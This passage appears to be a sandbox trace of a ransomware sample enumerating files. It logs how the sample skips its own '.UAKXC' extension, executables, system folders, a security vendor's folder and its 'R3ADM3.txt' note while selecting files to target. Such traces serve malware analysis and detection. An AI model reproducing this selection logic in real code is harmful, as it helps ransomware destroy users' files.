lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bedb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x647bedb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x647bedb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.484] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.484] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.484] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.484] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.484] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.484] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.484] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.485] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.485] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.485] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader", cAlternateFileName="")) returned 1 [0160.485] lstrcmpW (lpString1="Reader", lpString2=".") returned 1 [0160.485] lstrcmpW (lpString1="Reader", lpString2="..") returned 1 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="tmp") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="winnt") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="temp") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="thumb") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="$Recycle.Bin") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="System Volume Information") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="Boot") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="Windows") returned 0x0 [0160.485] StrStrIW (lpFirst="Reader", lpSrch="Trend Micro") returned 0x0 [0160.485] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.485] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.485] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.485] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7793088 [0160.485] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.485] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.485] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4176, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMe.htm", cAlternateFileName="")) returned 1 [0160.485] lstrcmpW (lpString1="ReadMe.htm", lpString2=".") returned 1 [0160.485] lstrcmpW (lpString1="ReadMe.htm", lpString2="..") returned 1 [0160.485] StrStrIW (lpFirst="ReadMe.htm", lpSrch=".UAKXC") returned 0x0 [0160.485] StrStrIW (lpFirst="ReadMe.htm", lpSrch=".exe") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMe.htm", lpSrch=".dll") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMe.htm", lpSrch=".lnk") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMe.htm", lpSrch=".sys") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMe.htm", lpSrch=".msi") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMe.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.486] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b78 [0160.486] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.486] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.486] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.486] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.486] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.486] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b78 | out: hHeap=0xea0000) returned 1 [0160.486] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.486] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b78 [0160.486] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794d90 [0160.486] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.486] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.486] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3f71, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeCS.htm", cAlternateFileName="")) returned 1 [0160.486] lstrcmpW (lpString1="ReadMeCS.htm", lpString2=".") returned 1 [0160.486] lstrcmpW (lpString1="ReadMeCS.htm", lpString2="..") returned 1 [0160.486] StrStrIW (lpFirst="ReadMeCS.htm", lpSrch=".UAKXC") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMeCS.htm", lpSrch=".exe") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMeCS.htm", lpSrch=".dll") returned 0x0 [0160.486] StrStrIW (lpFirst="ReadMeCS.htm", lpSrch=".lnk") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCS.htm", lpSrch=".sys") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCS.htm", lpSrch=".msi") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCS.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d08 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.487] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.487] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.487] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d08 | out: hHeap=0xea0000) returned 1 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d08 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794e08 [0160.487] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.487] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.487] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3fa1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeCT.htm", cAlternateFileName="")) returned 1 [0160.487] lstrcmpW (lpString1="ReadMeCT.htm", lpString2=".") returned 1 [0160.487] lstrcmpW (lpString1="ReadMeCT.htm", lpString2="..") returned 1 [0160.487] StrStrIW (lpFirst="ReadMeCT.htm", lpSrch=".UAKXC") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCT.htm", lpSrch=".exe") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCT.htm", lpSrch=".dll") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCT.htm", lpSrch=".lnk") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCT.htm", lpSrch=".sys") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCT.htm", lpSrch=".msi") returned 0x0 [0160.487] StrStrIW (lpFirst="ReadMeCT.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd88 [0160.487] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.488] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.488] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.488] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd88 | out: hHeap=0xea0000) returned 1 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd88 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794e80 [0160.488] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.488] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.488] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4623, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeCZE.htm", cAlternateFileName="REE3F7~1.HTM")) returned 1 [0160.488] lstrcmpW (lpString1="ReadMeCZE.htm", lpString2=".") returned 1 [0160.488] lstrcmpW (lpString1="ReadMeCZE.htm", lpString2="..") returned 1 [0160.488] StrStrIW (lpFirst="ReadMeCZE.htm", lpSrch=".UAKXC") returned 0x0 [0160.488] StrStrIW (lpFirst="ReadMeCZE.htm", lpSrch=".exe") returned 0x0 [0160.488] StrStrIW (lpFirst="ReadMeCZE.htm", lpSrch=".dll") returned 0x0 [0160.488] StrStrIW (lpFirst="ReadMeCZE.htm", lpSrch=".lnk") returned 0x0 [0160.488] StrStrIW (lpFirst="ReadMeCZE.htm", lpSrch=".sys") returned 0x0 [0160.488] StrStrIW (lpFirst="ReadMeCZE.htm", lpSrch=".msi") returned 0x0 [0160.488] StrStrIW (lpFirst="ReadMeCZE.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77950e8 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.488] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.488] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.489] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.489] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77950e8 | out: hHeap=0xea0000) returned 1 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77950e8 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794ef8 [0160.489] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.489] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.489] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeHRV.htm", cAlternateFileName="RE2D2E~1.HTM")) returned 1 [0160.489] lstrcmpW (lpString1="ReadMeHRV.htm", lpString2=".") returned 1 [0160.489] lstrcmpW (lpString1="ReadMeHRV.htm", lpString2="..") returned 1 [0160.489] StrStrIW (lpFirst="ReadMeHRV.htm", lpSrch=".UAKXC") returned 0x0 [0160.489] StrStrIW (lpFirst="ReadMeHRV.htm", lpSrch=".exe") returned 0x0 [0160.489] StrStrIW (lpFirst="ReadMeHRV.htm", lpSrch=".dll") returned 0x0 [0160.489] StrStrIW (lpFirst="ReadMeHRV.htm", lpSrch=".lnk") returned 0x0 [0160.489] StrStrIW (lpFirst="ReadMeHRV.htm", lpSrch=".sys") returned 0x0 [0160.489] StrStrIW (lpFirst="ReadMeHRV.htm", lpSrch=".msi") returned 0x0 [0160.489] StrStrIW (lpFirst="ReadMeHRV.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795110 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.489] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.489] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.489] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795110 | out: hHeap=0xea0000) returned 1 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.489] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795110 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794f70 [0160.490] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.490] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.490] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4274, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeHUN.htm", cAlternateFileName="RE50AF~1.HTM")) returned 1 [0160.490] lstrcmpW (lpString1="ReadMeHUN.htm", lpString2=".") returned 1 [0160.490] lstrcmpW (lpString1="ReadMeHUN.htm", lpString2="..") returned 1 [0160.490] StrStrIW (lpFirst="ReadMeHUN.htm", lpSrch=".UAKXC") returned 0x0 [0160.490] StrStrIW (lpFirst="ReadMeHUN.htm", lpSrch=".exe") returned 0x0 [0160.490] StrStrIW (lpFirst="ReadMeHUN.htm", lpSrch=".dll") returned 0x0 [0160.490] StrStrIW (lpFirst="ReadMeHUN.htm", lpSrch=".lnk") returned 0x0 [0160.490] StrStrIW (lpFirst="ReadMeHUN.htm", lpSrch=".sys") returned 0x0 [0160.490] StrStrIW (lpFirst="ReadMeHUN.htm", lpSrch=".msi") returned 0x0 [0160.490] StrStrIW (lpFirst="ReadMeHUN.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795138 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.490] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.490] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.490] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795138 | out: hHeap=0xea0000) returned 1 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795138 [0160.490] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794fe8 [0160.490] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.491] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.491] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeJ.htm", cAlternateFileName="")) returned 1 [0160.491] lstrcmpW (lpString1="ReadMeJ.htm", lpString2=".") returned 1 [0160.491] lstrcmpW (lpString1="ReadMeJ.htm", lpString2="..") returned 1 [0160.491] StrStrIW (lpFirst="ReadMeJ.htm", lpSrch=".UAKXC") returned 0x0 [0160.491] StrStrIW (lpFirst="ReadMeJ.htm", lpSrch=".exe") returned 0x0 [0160.491] StrStrIW (lpFirst="ReadMeJ.htm", lpSrch=".dll") returned 0x0 [0160.491] StrStrIW (lpFirst="ReadMeJ.htm", lpSrch=".lnk") returned 0x0 [0160.491] StrStrIW (lpFirst="ReadMeJ.htm", lpSrch=".sys") returned 0x0 [0160.491] StrStrIW (lpFirst="ReadMeJ.htm", lpSrch=".msi") returned 0x0 [0160.491] StrStrIW (lpFirst="ReadMeJ.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.491] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795160 [0160.491] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.491] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.491] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.491] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.491] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.491] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795160 | out: hHeap=0xea0000) returned 1 [0160.491] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.491] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795160 [0160.491] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77960e8 [0160.491] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.491] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.491] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeK.htm", cAlternateFileName="")) returned 1 [0160.491] lstrcmpW (lpString1="ReadMeK.htm", lpString2=".") returned 1 [0160.491] lstrcmpW (lpString1="ReadMeK.htm", lpString2="..") returned 1 [0160.492] StrStrIW (lpFirst="ReadMeK.htm", lpSrch=".UAKXC") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMeK.htm", lpSrch=".exe") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMeK.htm", lpSrch=".dll") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMeK.htm", lpSrch=".lnk") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMeK.htm", lpSrch=".sys") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMeK.htm", lpSrch=".msi") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMeK.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795188 [0160.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.492] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.492] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.492] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795188 | out: hHeap=0xea0000) returned 1 [0160.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795188 [0160.492] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796160 [0160.492] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.492] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.492] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMePOL.htm", cAlternateFileName="RECE99~1.HTM")) returned 1 [0160.492] lstrcmpW (lpString1="ReadMePOL.htm", lpString2=".") returned 1 [0160.492] lstrcmpW (lpString1="ReadMePOL.htm", lpString2="..") returned 1 [0160.492] StrStrIW (lpFirst="ReadMePOL.htm", lpSrch=".UAKXC") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMePOL.htm", lpSrch=".exe") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMePOL.htm", lpSrch=".dll") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMePOL.htm", lpSrch=".lnk") returned 0x0 [0160.492] StrStrIW (lpFirst="ReadMePOL.htm", lpSrch=".sys") returned 0x0 [0160.493] StrStrIW (lpFirst="ReadMePOL.htm", lpSrch=".msi") returned 0x0 [0160.493] StrStrIW (lpFirst="ReadMePOL.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.493] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77951b0 [0160.493] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.493] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.493] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.493] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.493] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.493] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77951b0 | out: hHeap=0xea0000) returned 1 [0160.493] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.493] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77951b0 [0160.493] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77961d8 [0160.494] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) 